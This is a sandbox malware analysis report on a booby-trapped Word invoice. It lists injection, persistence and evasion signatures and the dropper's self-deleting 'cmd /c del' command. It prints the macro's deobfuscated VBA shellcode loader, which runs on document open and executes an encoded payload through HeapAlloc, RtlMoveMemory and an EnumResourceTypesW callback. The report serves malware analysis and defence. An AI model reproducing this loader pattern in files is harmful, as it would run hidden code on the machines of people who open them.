Analysis Report
Overview
General Information |
---|
Joe Sandbox Version: | 17.0.0 |
Analysis ID: | 14 |
Start time: | 15:28:20 |
Joe Sandbox Product: | Desktop |
Start date: | 08.12.2016 |
Overall analysis duration: | 0h 7m 42s |
Report type: | full |
Sample file name: | bill_0803708258.doc |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | W7 32bit with Office 2010 |
Number of new started processes analysed: | 10 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
Detection: | MAL |
Classification: | mal100.evad.expl.winDOC@11/8@0/0 |
Cookbook Comments: |
Warnings: |
Detection |
---|
Strategy | Score | Range |
---|---|---|
Threshold | 100 | 0 - 100 |
Classification |
---|
Analysis Advice |
---|
Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox |
Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook |
Sample sleeps for a long time, analyze it with the 'Bypass long sleeps' cookbook |
Signature Overview |
---|
Software Vulnerabilities: |
---|
Document exploit detected (process start blacklist hit) |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: |
Document exploit detected (creates forbidden files) |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: |
Document exploit detected (drops PE files) |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: |
Networking: |
---|
Downloads files |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: |
Boot Survival: |
---|
Creates an autostart registry key |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe | Registry value created or modified: |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe | Registry value created or modified: |
Creates an autostart registry key pointing to a binary in C:\Windows |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe | Registry value created or modified: |
Persistence and Installation Behavior: |
---|
Drops PE files |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe | File created: |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: |
Drops PE files to the Windows directory (C:\Windows) |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe | File created: |
Drops executables to the Windows directory (C:\Windows) and starts them |
Source: C:\Windows\System32\WinHost32.exe | Executable created and started: |
Data Obfuscation: |
---|
Entry point lies outside standard sections |
Source: initial sample | Static PE information: |
PE file contains sections with non-standard names |
Source: re717.exe.3848.dr | Static PE information: |
Source: WinHost32.exe.3048.dr | Static PE information: |
System Summary: |
---|
Tries to open an application configuration file (.cfg) |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe | File opened: |
Checks whether the correct version of .NET is installed |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: |
Executable creates window controls seldom found in malware |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Window found: |
Found graphical window changes (likely an installer) |
Source: Window Recorder | Window detected: |
Checks if Microsoft Office is installed |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: |
Uses new MSVCR DLLs |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: |
Document has a 'bytes' value indicative of goodware |
Source: bill_0803708258.doc | Initial sample: |
Classification label |
Source: classification engine | Classification label: |
Creates files inside the user directory |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: |
Creates temporary files |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: |
Document contains an OLE Word Document stream indicating a Microsoft Word file |
Source: bill_0803708258.doc | OLE indicator, Word Document stream: |
Reads ini files |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: |
Reads software policies |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: |
Spawns processes |
Source: unknown | Process created: |
Source: unknown | Process created: |
Source: unknown | Process created: |
Source: unknown | Process created: |
Source: unknown | Process created: |
Source: unknown | Process created: |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe | Process created: |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe | Process created: |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe | Process created: |
Source: C:\Windows\System32\WinHost32.exe | Process created: |
Uses an in-process (OLE) Automation server |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key value queried: |
Creates files inside the system directory |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe | File created: |
Document contains embedded VBA macros |
Source: bill_0803708258.doc | OLE indicator, VBA macros: |
Document contains summary information with irregular field values |
Source: bill_0803708258.doc | OLE document summary: |
PE file contains executable resources (Code or Archives) |
Source: re717.exe.3848.dr | Static PE information: |
Source: WinHost32.exe.3048.dr | Static PE information: |
Reads the hosts file |
Source: C:\Windows\System32\WinHost32.exe | File read: |
Document contains an embedded VBA macro which executes code when the document is opened / closed |
Source: bill_0803708258.doc | OLE, VBA macro line: |
Source: VBA code instrumentation | OLE, VBA macro: | Name: Document_Open |
Document contains an embedded VBA macro which may execute processes |
Source: bill_0803708258.doc | OLE, VBA macro line: |
Document contains an embedded VBA macro which may execute shellcode |
Document contains an embedded VBA macro with suspicious strings |
Document contains an embedded VBA macro with base64 encoded strings |
Source: VBA code instrumentation | OLE, VBA macro: |
HIPS / PFW / Operating System Protection Evasion: |
---|
Injects a PE file into a foreign process |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe | Memory written: |
Source: C:\Windows\System32\WinHost32.exe | Memory written: |
Modifies the context of a thread in another process (thread injection) |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe | Thread register set: |
Sets debug register (to hijack the execution of another thread) |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe | Thread register set: |
Anti Debugging: |
---|
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation)) |
Source: C:\Windows\System32\WinHost32.exe | System information queried: |
Malware Analysis System Evasion: |
---|
Queries a list of all running processes |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe | Process information queried: |
Found a high number of Window / User specific system calls (may be a loop to detect user behavior) |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Window / User API: |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Window / User API: |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe | Window / User API: |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe | Window / User API: |
Source: C:\Windows\System32\WinHost32.exe | Window / User API: |
Source: C:\Windows\System32\WinHost32.exe | Window / User API: |
Found dropped PE file which has not been started or loaded |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Dropped PE file which has not been started: |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe | Dropped PE file which has not been started: |
Is looking for software installed on the system |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Registry key enumerated: |
May sleep (evasive loops) to hinder dynamic analysis |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe TID: 3040 | Thread sleep count: |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe TID: 3040 | Thread sleep count: |
Source: C:\Windows\System32\WinHost32.exe TID: 2468 | Thread sleep count: |
Source: C:\Windows\System32\WinHost32.exe TID: 2468 | Thread sleep count: |
Hooking and other Techniques for Hiding and Protection: |
---|
Disables application error messages (SetErrorMode) |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe | Process information set: |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe | Process information set: |
Source: C:\Windows\System32\cmd.exe | Process information set: |
Language, Device and Operating System Detection: |
---|
Queries the cryptographic machine GUID |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key value queried: |
Behavior Graph |
---|
Yara Overview |
---|
No Yara matches |
---|
Screenshot |
---|
Startup |
---|
Created / dropped Files |
---|
File Path | Type and Hashes |
---|---|
Contacted Domains/Contacted IPs |
---|
Static File Info |
---|
General | |
---|---|
File type: | 0 |
TrID: |
File name: | bill_0803708258.doc |
File size: | 166400 |
MD5: | 3ebd49f7168ff668d617a174b1e7c30a |
SHA1: | 0dfeda64a48d26442660ed954c2aca8d1f1ba4e2 |
SHA256: | e1cfa6e63e13095e4060b18e11b091712fb8508b403eb0b1de271ee73e5e8008 |
SHA512: | c55bab4b42a07c307eb6ee585e62699cf89be6b4911153d571b6589f2a57f24da84b82f8dd9767176fe438fdce3688f434603506abec38374aa92a9043485b87 |
File Icon |
---|
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Office Word |
Encrypted Document: | False |
Contains Word Document Stream: | True |
Contains Workbook/Book Stream: | False |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | False |
Flash Objects Count: | 0 |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1252 |
Title: | |
Subject: | |
Author: | Helen |
Keywords: | |
Comments: | |
Template: | Normal.dot |
Last Saved By: | User |
Revision Number: | 13 |
Total Edit Time: | 120 |
Create Time: | 2016-09-26 13:32:00 |
Last Saved Time: | 2016-09-26 14:35:00 |
Number of Pages: | 1 |
Number of Words: | 0 |
Number of Characters: | 2 |
Creating Application: | Microsoft Office Word |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | -535 |
Number of Bytes: | 11000 |
Number of Lines: | 1 |
Number of Paragraphs: | 1 |
Thumbnail Scaling Desired: | False |
Company: | |
Contains Dirty Links: | False |
Shared Document: | False |
Changed Hyperlinks: | False |
Application Version: | 726502 |
Streams with VBA |
---|
VBA File Name: ThisDocument.cls, Stream Size: 8470 |
---|
General | |
---|---|
Stream Path: | Macros/VBA/ThisDocument |
VBA File Name: | ThisDocument.cls |
Stream Size: | 8470 |
VBA Code with Deobfuscations |
---|
VBA Code |
---|
VBA File Name: andosite.bas, Stream Size: 16341 |
---|
General | |
---|---|
Stream Path: | Macros/VBA/andosite |
VBA File Name: | andosite.bas |
Stream Size: | 16341 |
Data ASCII (readable strings in the stream): | RtlMoveMemory, SelectObject, GetPriorityClass, EndDialog, CreateEventA |
VBA Code with Deobfuscations |
---|
VBA Code |
---|
VBA File Name: crappie.frm, Stream Size: 1158 |
---|
General | |
---|---|
Stream Path: | Macros/VBA/crappie |
VBA File Name: | crappie.frm |
Stream Size: | 1158 |
VBA Code with Deobfuscations |
---|
VBA Code |
---|
Streams |
---|
Stream Path: \x1CompObj, File Type: data, Stream Size: 144 |
---|
General | |
---|---|
Stream Path: | \x1CompObj |
File Type: | data |
Stream Size: | 144 |
Entropy: | 3.91953852555 |
Base64 Encoded: | False |
Data ASCII (decoded strings): | MSWordDoc, Word.Document.8, and the UTF-16LE user type name "Документ Microsoft Office Word" |
Stream Path: \x5DocumentSummaryInformation, File Type: FoxPro FPT, blocks size 512, next free block index 4278124544, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | FoxPro FPT, blocks size 512, next free block index 4278124544 |
Stream Size: | 4096 |
Entropy: | 0.303043979959 |
Base64 Encoded: | False |
Stream Path: \x5SummaryInformation, File Type: FoxPro FPT, blocks size 512, next free block index 4278124544, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | FoxPro FPT, blocks size 512, next free block index 4278124544 |
Stream Size: | 4096 |
Entropy: | 0.458075214693 |
Base64 Encoded: | False |
Stream Path: 1Table, File Type: FoxPro FPT, blocks size 256, next free block index 2248281856, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | 1Table |
File Type: | FoxPro FPT, blocks size 256, next free block index 2248281856 |
Stream Size: | 4096 |
Entropy: | 2.22928850159 |
Base64 Encoded: | False |
Stream Path: Data, File Type: data, Stream Size: 50523 |
---|
General | |
---|---|
Stream Path: | Data |
File Type: | data |
Stream Size: | 50523 |
Entropy: | 5.60731034209 |
Base64 Encoded: | True |
Data ASCII (readable strings in the stream): | pic, PNG, IHDR, pHYs (an embedded PNG image) |
Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 528 |
---|
General | |
---|---|
Stream Path: | Macros/PROJECT |
File Type: | ASCII text, with CRLF line terminators |
Stream Size: | 528 |
Entropy: | 5.37335735734 |
Base64 Encoded: | True |
Data (decoded text, one line per entry): | ID="{C68CDA7A-29A4-4BB3-A4BB-3551FE62691A}" ; Document=ThisDocument/&H00000000 ; Module=andosite ; Package={AC9F2F90-E877-11CE-9F68-00AA00574A4F} ; BaseClass=crappie ; Name="Project" ; HelpContextID="0" ; VersionCompatible32="393222000" ; CMG="3B393807770B770B770B (truncated in the report) |
Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 92 |
---|
General | |
---|---|
Stream Path: | Macros/PROJECTwm |
File Type: | data |
Stream Size: | 92 |
Entropy: | 3.25790113519 |
Base64 Encoded: | False |
Data (decoded text): | ThisDocument, andosite, crappie (each module name stored once as ANSI and once as UTF-16LE) |
Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5887 |
---|
General | |
---|---|
Stream Path: | Macros/VBA/_VBA_PROJECT |
File Type: | data |
Stream Size: | 5887 |
Entropy: | 5.20766383872 |
Base64 Encoded: | True |
Data ASCII (decoded UTF-16LE reference string): | *\G{000204EF-0000-0000-C000-000000000046}#4.0#9#C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL#Visual Basic F (truncated in the report) |
Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 843 |
---|
General | |
---|---|
Stream Path: | Macros/VBA/dir |
File Type: | data |
Stream Size: | 843 |
Entropy: | 6.49606511643 |
Base64 Encoded: | True |
Data ASCII (readable fragments; the dir stream is stored compressed): | Project, stdole, OLE Automation, Normal |
Stream Path: Macros/crappie/\x1CompObj, File Type: data, Stream Size: 97 |
---|
General | |
---|---|
Stream Path: | Macros/crappie/\x1CompObj |
File Type: | data |
Stream Size: | 97 |
Entropy: | 3.61064918306 |
Base64 Encoded: | False |
Data ASCII (decoded strings): | Microsoft Forms 2.0 Form, Embedded Object |
Stream Path: Macros/crappie/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 312 |
---|
General | |
---|---|
Stream Path: | Macros/crappie/\x3VBFrame |
File Type: | ASCII text, with CRLF line terminators |
Stream Size: | 312 |
Entropy: | 4.5489278468 |
Base64 Encoded: | True |
Data (decoded text, one line per entry): | VERSION 5.00 ; Begin {C62A69F0-16DC-11CE-9E98-00AA00574A4F} crappie ; Caption = "heure" ; ClientHeight = 4515 ; ClientLeft = 45 ; ClientTop = 375 ; ClientWidth = 3900 ; HelpContextID = 44 ; StartUpPosit (truncated in the report) |
Stream Path: Macros/crappie/f, File Type: data, Stream Size: 9176 |
---|
General | |
---|---|
Stream Path: | Macros/crappie/f |
File Type: | data |
Stream Size: | 9176 |
Entropy: | 5.34937606033 |
Base64 Encoded: | True |
Stream Path: Macros/crappie/i01/\x1CompObj, File Type: data, Stream Size: 112 |
---|
General | |
---|---|
Stream Path: | Macros/crappie/i01/\x1CompObj |
File Type: | data |
Stream Size: | 112 |
Entropy: | 4.6011544911 |
Base64 Encoded: | False |
Data ASCII (decoded strings): | Microsoft Forms 2.0 Frame, Embedded Object, Forms.Frame.1 |
Stream Path: Macros/crappie/i01/f, File Type: data, Stream Size: 48 |
---|
General | |
---|---|
Stream Path: | Macros/crappie/i01/f |
File Type: | data |
Stream Size: | 48 |
Entropy: | 2.34371071693 |
Base64 Encoded: | False |
Stream Path: Macros/crappie/i01/o, File Type: empty, Stream Size: 0 |
---|
General | |
---|---|
Stream Path: | Macros/crappie/i01/o |
File Type: | empty |
Stream Size: | 0 |
Entropy: | 0.0 |
Base64 Encoded: | False |
Stream Path: Macros/crappie/o, File Type: empty, Stream Size: 0 |
---|
General | |
---|---|
Stream Path: | Macros/crappie/o |
File Type: | empty |
Stream Size: | 0 |
Entropy: | 0.0 |
Base64 Encoded: | False |
Stream Path: WordDocument, File Type: data, Stream Size: 52501 |
---|
General | |
---|---|
Stream Path: | WordDocument |
File Type: | data |
Stream Size: | 52501 |
Entropy: | 7.46691549854 |
Base64 Encoded: | True |
Network Behavior |
---|
No network behavior found |
---|
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Memory Usage |
---|
High Level Behavior Distribution |
---|
Behavior |
---|
System Behavior |
---|
General |
---|
Start time: | 15:29:40 |
Start date: | 08/12/2016 |
Path: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Wow64 process (32bit): | false |
Commandline: | unknown |
Imagebase: | 0x2fef0000 |
File size: | 1422168 bytes |
MD5 hash: | 113371C5AC72FCE072F707C55E7845B9 |
Programmed in: | C, C++ or other language |
General |
---|
Start time: | 15:29:55 |
Start date: | 08/12/2016 |
Path: | C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe |
Wow64 process (32bit): | false |
Commandline: | C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe |
Imagebase: | 0x400000 |
File size: | 37376 bytes |
MD5 hash: | 18B827BD1ABF15A978C89878BC02B355 |
Programmed in: | C, C++ or other language |
General |
---|
Start time: | 15:29:59 |
Start date: | 08/12/2016 |
Path: | C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe |
Wow64 process (32bit): | false |
Commandline: | C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe |
Imagebase: | 0x400000 |
File size: | 37376 bytes |
MD5 hash: | 18B827BD1ABF15A978C89878BC02B355 |
Programmed in: | C, C++ or other language |
General |
---|
Start time: | 15:30:37 |
Start date: | 08/12/2016 |
Path: | C:\Windows\System32\WinHost32.exe |
Wow64 process (32bit): | false |
Commandline: | C:\Windows\System32\WinHost32.exe |
Imagebase: | 0x400000 |
File size: | 37376 bytes |
MD5 hash: | 18B827BD1ABF15A978C89878BC02B355 |
Programmed in: | C, C++ or other language |
General |
---|
Start time: | 15:30:37 |
Start date: | 08/12/2016 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | /c del C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe >> NUL |
Imagebase: | 0x4aac0000 |
File size: | 302592 bytes |
MD5 hash: | AD7B9C14083B52BC532FBA5948342B98 |
Programmed in: | C, C++ or other language |
General |
---|
Start time: | 15:30:40 |
Start date: | 08/12/2016 |
Path: | C:\Windows\System32\WinHost32.exe |
Wow64 process (32bit): | false |
Commandline: | C:\Windows\System32\WinHost32.exe |
Imagebase: | 0x400000 |
File size: | 37376 bytes |
MD5 hash: | 18B827BD1ABF15A978C89878BC02B355 |
Programmed in: | C, C++ or other language |
Disassembly |
---|
Call Graph |
---|
Graph: interactive call graph (not reproduced here); legend: Entrypoint, Decryption Function, Executed, Not Executed
Module: ThisDocument |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "ThisDocument" |
2 | Attribute VB_Base = "1Normal.ThisDocument" |
3 | Attribute VB_GlobalNameSpace = False |
4 | Attribute VB_Creatable = False |
5 | Attribute VB_PredeclaredId = True |
6 | Attribute VB_Exposed = True |
7 | Attribute VB_TemplateDerived = True |
8 | Attribute VB_Customizable = True |
9 | Dim hydrocharitaceae as String |
10 | Dim munching as Integer |
11 | Dim differ as Long |
12 | Dim titubate as String |
Executed Functions |
---|
APIs | Meta Information |
---|---|
Part of subcall function bloodied@ThisDocument: csociality | |
Part of subcall function bloodied@ThisDocument: Left | |
Part of subcall function bloodied@ThisDocument: Mid | |
Part of subcall function bloodied@ThisDocument: UCase | |
Part of subcall function bloodied@ThisDocument: Left | |
Part of subcall function bloodied@ThisDocument: Right | |
Part of subcall function bloodied@ThisDocument: Left | |
Part of subcall function bloodied@ThisDocument: Right | |
Part of subcall function bloodied@ThisDocument: UCase | |
Part of subcall function bloodied@ThisDocument: Mid | |
Part of subcall function bloodied@ThisDocument: impissation | |
Part of subcall function bloodied@ThisDocument: plevna | |
Part of subcall function bloodied@ThisDocument: Right | |
Part of subcall function bloodied@ThisDocument: UCase | |
Part of subcall function bloodied@ThisDocument: LCase | |
Part of subcall function bloodied@ThisDocument: Mid | |
Part of subcall function bloodied@ThisDocument: arranger | |
Part of subcall function bloodied@ThisDocument: Mid | |
Part of subcall function bloodied@ThisDocument: Right | |
Part of subcall function bloodied@ThisDocument: LCase | |
UCase |
Strings | Decrypted Strings |
---|---|
"gesneriaceae" | |
"bountiful" | |
"mo" | |
"mot""orized" | |
"sT" | |
"mo" | |
"sT" | |
"bountiful" | |
"mot""orized" |
Line | Instruction | Meta Information |
---|---|---|
133 | Private Sub Document_Open() | |
134 | Dim casa as Byte | executed |
135 | Dim omnipresence as Variant | |
136 | aldol = "gesneriaceae" | |
137 | bloodied | |
138 | microtus = 80 | |
139 | arcidae = 74 | |
140 | If microtus + arcidae < 8 Then | |
141 | microtus = "mo" + UCase("sT") | UCase |
142 | titubate = "bountiful" | |
143 | eruditeness = "mot" + "orized" | |
144 | Else | |
145 | munching = munching / 280 | |
146 | arcidae = 9 | |
147 | Endif | |
148 | End Sub |
APIs | Meta Information |
---|---|
csociality | |
Part of subcall function phonocamptic@andosite: Mid | |
Part of subcall function phonocamptic@andosite: Asc | |
Part of subcall function phonocamptic@andosite: CByte | |
Part of subcall function phonocamptic@andosite: UBound | |
Part of subcall function phonocamptic@andosite: Mid | |
Part of subcall function phonocamptic@andosite: LCase | |
Part of subcall function phonocamptic@andosite: Mid | |
Part of subcall function phonocamptic@andosite: UCase | |
Part of subcall function phonocamptic@andosite: Left | |
Part of subcall function phonocamptic@andosite: UCase | |
Part of subcall function phonocamptic@andosite: Left | |
Part of subcall function phonocamptic@andosite: Mid | |
Part of subcall function phonocamptic@andosite: Left | |
Part of subcall function phonocamptic@andosite: LCase | |
Part of subcall function phonocamptic@andosite: UBound | |
Part of subcall function phonocamptic@andosite: UCase | |
Part of subcall function phonocamptic@andosite: LCase | |
Part of subcall function phonocamptic@andosite: Mid | |
Part of subcall function phonocamptic@andosite: UBound | |
Left | |
Mid | |
UCase | |
Left | |
Right | |
Left | |
Right | |
UCase | |
Mid | |
kernel32!HeapCreate | kernel32!HeapCreate(262144,0,0) |
kernel32!HeapAlloc | kernel32!HeapAlloc(123076608,0,3287) |
Right | |
UCase | |
Part of subcall function misstanding@ThisDocument: Left | |
Part of subcall function misstanding@ThisDocument: Right | |
Part of subcall function misstanding@ThisDocument: Left | |
Part of subcall function misstanding@ThisDocument: Mid | |
Part of subcall function misstanding@ThisDocument: Path | |
Part of subcall function misstanding@ThisDocument: Name | |
Part of subcall function agural@ThisDocument: methyltestosterone | |
Part of subcall function agural@ThisDocument: VarPtr | |
Part of subcall function agural@ThisDocument: LCase | |
Part of subcall function agural@ThisDocument: UCase | |
Part of subcall function agural@ThisDocument: LCase | |
Part of subcall function agural@ThisDocument: methyltestosterone | |
LCase | |
Mid | |
kernel32!EnumResourceTypesW | kernel32!EnumResourceTypesW(0,123080841,"C:/bill_0803708258.doc") |
Mid | |
Right | |
LCase |
Strings | Decrypted Strings |
---|---|
"Pr" | |
"gleesome" | |
"piapostasy" | |
"gleesome" | |
"piapostasy" | |
"Pr" | |
"gavia" | |
"secularization" | |
"CS" | |
"boarmed" | |
"boarmed" | |
"CS" | |
"abrupt" | |
"touchstone" | |
"domesticationbe" | |
"archerfish" | |
"archerfish" | |
"cotinus" | |
"cycling" | |
"chewy" | |
"ab" | |
"advowson" | |
"AM" | |
"atrialbebastion" | |
"atrialbebastion" | |
"AM" |
Line | Instruction | Meta Information |
---|---|---|
35 | Sub bloodied() | |
36 | Dim airhole as Integer | executed |
37 | Dim anaerobic as Integer | |
38 | bullshot = crappie.csociality.ControlTipText | csociality |
39 | anemometric = andosite.phonocamptic(bullshot) | |
40 | For eastcentral = 42 To 67 | |
41 | dingbat = 67 | |
42 | titubate = "gleesome" | |
43 | ectoproct = Left("piapostasy", 2) & "geon" & Mid("stockistholemotherofpearl", 9, 4) | Left Mid |
44 | ectoproct = UCase("Pr") & Left("ayinitaly", 4) & Right("basedg", 1) | UCase Left Right |
45 | Next eastcentral | |
47 | saucepan = "gavia" | |
48 | #if Win64 then | |
49 | Dim bigswoln as Integer | |
50 | Dim comatose as LongPtr | |
51 | Dim limewater as Long | |
52 | #else | |
53 | Dim guerrilla as Variant | |
54 | Dim unmaligned as Long | |
55 | Dim comatose as Long | |
56 | #endif | |
57 | besom = 35 - 85 + 3 + 47 | |
58 | acidfast = "secularization" | |
59 | acquest = 4096 | |
60 | ablepsia = 11 | |
61 | While ablepsia < 14 | |
62 | alternator = Left("boarmed", 2) + Right("epitheliodiling", 5) | Left Right |
63 | grosgrain = UCase("CS") & Mid("debrisubstitutenonsmoker", 7, 9) | UCase Mid |
64 | ablepsia = ablepsia + 1 | |
65 | munching = differ - 318 | |
66 | Wend | |
68 | loiseleuria = impissation(262144, 0, 0) | kernel32!HeapCreate(262144,0,0) executed |
69 | comatose = plevna(loiseleuria, 0, 3287) | kernel32!HeapAlloc(123076608,0,3287) executed |
70 | dividing = "abrupt" | |
71 | Dim dirtyminded as String | |
72 | disclose = "touchstone" | |
73 | peacocks = Right("domesticationbe", 2) + UCase("EfY") | Right UCase |
74 | dirtyminded = misstanding | |
75 | striated = 3 | |
76 | While striated < 8 | |
77 | striated = striated + 1 | |
78 | titubate = "archerfish" | |
79 | Wend | |
81 | affriction = anemometric | |
82 | biliary = "cotinus" | |
83 | agural comatose, affriction | |
84 | cerambycidae = "cycling" | |
85 | #if Win64 then | |
86 | Dim eggshell as Variant | |
87 | contagion = "chewy" | |
88 | occlusion = LCase("ab") & Mid("afterhourslepscartload", 11, 4) & "y" | LCase Mid |
89 | gasp = "advowson" | |
90 | mors = 64 - 58 + 125 + 445 | |
91 | #else | |
92 | mors = 22 + 484 + 1727 | |
93 | #endif | |
94 | Dim di as String | |
95 | Dim stopwatch as Long | |
96 | Dim deathrate as Long | |
97 | deathrate = 0 | |
98 | Dim galician as Long | |
99 | galician = comatose + mors | |
100 | oman = arranger(deathrate, galician, dirtyminded) | kernel32!EnumResourceTypesW(0,123080841,"C:/bill_0803708258.doc") executed |
101 | For tartars = 12 To 54 | |
102 | borrower = 54 | |
103 | munching = munching - 219 | |
104 | cortes = Mid("atrialbebastion", 7, 2) & Right("bassettowitch", 5) | Mid Right |
105 | cortes = LCase("AM") & LCase("BiveR") & "sion" | LCase |
106 | Next tartars | |
108 | End Sub |
APIs | Meta Information |
---|---|
ntdll!RtlMoveMemory | ntdll!RtlMoveMemory(0,3243072,4) |
VarPtr | |
LCase | |
UCase | |
LCase | |
ntdll!RtlMoveMemory | ntdll!RtlMoveMemory(123078608,92766092,3222) |
Strings | Decrypted Strings |
---|---|
"Ca" | |
"Ng" | |
"er""ecti" | |
"Ca" | |
"Ng" | |
"er""ecti" |
Line | Instruction | Meta Information |
---|---|---|
13 | Function agural(miniver, longheaded) | |
14 | Dim burrheaded as String | executed |
15 | Dim abysm as Byte | |
16 | differ = differ \ 426 | |
17 | Dim brownstone as Integer | |
18 | Dim guyana as Long | |
19 | Dim argonaut as Integer | |
20 | Dim furuncle as String | |
21 | Dim gnat as Long | |
22 | methyltestosterone guyana, ByVal VarPtr(longheaded) + 8, 4 | ntdll!RtlMoveMemory(0,3243072,4) VarPtr executed |
23 | munching = differ + 127 | |
24 | gnat = miniver | |
25 | For archetype = 26 To 76 | |
26 | sciotlo = 76 | |
27 | munching = munching \ 236 | |
28 | dusky = LCase("Ca") + UCase("tAlatIc") | LCase UCase |
29 | dusky = "er" & "ecti" & LCase("Ng") | LCase |
30 | Next archetype | |
32 | methyltestosterone ByVal gnat, ByVal guyana, 17 - 45 + 102 + 3148 | ntdll!RtlMoveMemory(123078608,92766092,3222) executed |
33 | differ = munching - 433 | |
34 | End Function |
APIs | Meta Information |
---|---|
Left | |
Right | |
Left | |
Mid | |
Path | |
Name |
Strings | Decrypted Strings |
---|---|
"fo" | |
"renomarchantia" | |
"stpussycat" | |
"fo" | |
"renomarchantia" | |
"stpussycat" |
Line | Instruction | Meta Information |
---|---|---|
110 | Function misstanding() | |
111 | Dim aise as Long | executed |
112 | Dim malfeasance as Long | |
113 | For dekagram = 5 To 56 | |
114 | wires = 56 | |
115 | titubate = titubate | |
116 | aslant = "fo" & Left("renomarchantia", 4) & Right("whiteliveredon", 2) | Left Right |
117 | aslant = Left("stpussycat", 2) & Mid("ursidaerucklithodidae", 8, 4) | Left Mid |
118 | Next dekagram | |
120 | constantan = ThisDocument.Path | Path |
121 | misstanding = constantan & "/" & ThisDocument.Name | Name |
122 | End Function |
Non-Executed Functions |
---|
APIs | Meta Information |
---|---|
wdHeaderFooterPrimary | |
wdHeaderFooterPrimary |
Strings | Decrypted Strings |
---|---|
"<Replace this with your text>" | |
"<Replace this with your text>" |
Line | Instruction | Meta Information |
---|---|---|
123 | Sub HeaderFooterObject() | |
124 | Dim MyText as String | |
125 | MyHeaderText = "<Replace this with your text>" | |
126 | MyFooterText = "<Replace this with your text>" | |
127 | With ActiveDocument.Sections(1) | |
128 | . Headers(wdHeaderFooterPrimary).Range.Text = MyHeaderText | wdHeaderFooterPrimary |
129 | . Footers(wdHeaderFooterPrimary).Range.Text = MyFooterText | wdHeaderFooterPrimary |
130 | End With | |
131 | End Sub |
Module: andosite |
---|
Declaration |
---|
Line | Content |
---|---|
